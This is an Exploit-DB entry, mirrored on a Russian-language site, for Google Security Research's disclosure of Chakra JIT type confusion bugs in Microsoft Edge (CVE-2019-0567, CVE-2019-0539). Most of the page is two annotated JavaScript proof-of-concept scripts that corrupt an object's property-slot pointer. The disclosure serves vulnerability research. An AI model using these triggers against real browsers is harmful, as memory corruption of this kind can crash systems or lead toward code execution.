- 18 Дек 2022
- EDB-ID
- 46203
- Проверка EDB
-
- Пройдено
- Автор
- GOOGLE SECURITY RESEARCH
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2019-0567 cve-2019-0539
- Дата публикации
- 2019-01-18
Microsoft Edge Chakra - 'NewScObjectNoCtor' or 'InitProto' Type Confusion
Код:
The NewScObjectNoCtor and InitProto opcodes are treated as having no side effects, but they actually can have side effects via the type handler's SetIsPrototype method, which can cause a transition to a new type. This can lead to type confusion in the JITed code.
In the PoC, this overwrites the pointer to the property slots with 0x1000000001234.
PoC for NewScObjectNoCtor:
/**
 * Intentionally empty constructor. `new cons()` inside opt() is the site that
 * emits the NewScObjectNoCtor opcode this PoC targets (see the description
 * above); the body is left empty and should not be changed, since the exact
 * shape of the constructor is what determines which opcode the engine emits.
 */
function cons() {
}
/**
 * Function that main() warms up so it gets JIT-compiled.
 *
 * Two property stores straddle `new cons()`. Per the description above, the
 * JIT treats NewScObjectNoCtor as side-effect-free, so it assumes `o` still
 * has the type it observed at `o.b = 1` when it stores `value` into `o.a`.
 * In the final call from main(), `cons.prototype` is `o` itself, so creating
 * the object presumably runs SetIsPrototype on `o` and transitions it to a
 * new type; the store into `o.a` then goes through a stale type layout
 * (type confusion). Statement order here is load-bearing.
 *
 * @param {object} o - target object: a fresh `{a, b}` literal during warm-up,
 *   the object that is also cons.prototype in the final call.
 * @param {*} value - value stored into o.a; the final call passes 0x1234.
 */
function opt(o, value) {
  o.b = 1;
  // NewScObjectNoCtor: the side effect the JIT does not model (see above).
  new cons();
  o.a = value;
}
/**
 * Entry point: trains the JIT, then triggers the confused store.
 *
 * The loop calls opt() 2000 times, each time with a fresh, unrelated
 * `cons.prototype`, presumably enough for Chakra to JIT opt() with
 * `new cons()` modelled as side-effect-free. The last call instead makes `o`
 * its own constructor's prototype, so the JITed opt() hits the type
 * transition it did not account for. `print` is not defined in this file;
 * it is assumed to be the JS shell's builtin (use console.log elsewhere).
 * The page classifies the outcome as a DoS.
 */
function main() {
  // Warm-up: prototype is never `o`, so no transition happens while training.
  for (let i = 0; i < 2000; i++) {
    cons.prototype = {};
    let o = {a: 1, b: 2};
    opt(o, {});
  }
  // Trigger: `o` becomes cons.prototype before the JITed opt() writes to it.
  let o = {a: 1, b: 2};
  cons.prototype = o;
  opt(o, 0x1234);
  print(o.a);
}
// Run the PoC (expected to crash or misbehave on a vulnerable Chakra build).
main();
PoC for InitProto:
/**
 * InitProto variant of the same bug; main() warms this up so it gets JITed.
 *
 * The object literal `{__proto__: proto}` emits the InitProto opcode, which
 * the description above says the JIT also treats as side-effect-free. When
 * `proto` is `o` itself (the final call in main()), making `o` a prototype
 * presumably runs SetIsPrototype and transitions `o` to a new type, yet the
 * JITed store `o.a = value` still uses the type observed at `o.b = 1`.
 * `tmp` is never read; the literal exists only to emit the opcode, and the
 * statement order is load-bearing.
 *
 * @param {object} o - target object.
 * @param {object} proto - prototype given to the throwaway literal; `o` in the final call.
 * @param {*} value - value stored into o.a; 0x1234 in the final call.
 */
function opt(o, proto, value) {
  o.b = 1;
  // InitProto: the side effect the JIT does not model (see above).
  let tmp = {__proto__: proto};
  o.a = value;
}
/**
 * Entry point: trains the JIT with a harmless prototype, then passes `o` as
 * its own prototype so the JITed opt() stores through a stale type.
 *
 * The 2000-iteration loop is presumably the warm-up needed for Chakra to
 * JIT opt(); every warm-up call uses a fresh literal as `proto`, never `o`.
 * `print` is not defined in this file; it is assumed to be the JS shell's
 * builtin (use console.log elsewhere). The page classifies the outcome as a DoS.
 */
function main() {
  // Warm-up: `proto` is an unrelated object, so `o` never becomes a prototype.
  for (let i = 0; i < 2000; i++) {
    let o = {a: 1, b: 2};
    opt(o, {}, {});
  }
  // Trigger: `o` is used as the prototype of the literal inside opt().
  let o = {a: 1, b: 2};
  opt(o, o, 0x1234);
  print(o.a);
}
// Run the PoC (expected to crash or misbehave on a vulnerable Chakra build).
main();
- Источник
- www.exploit-db.com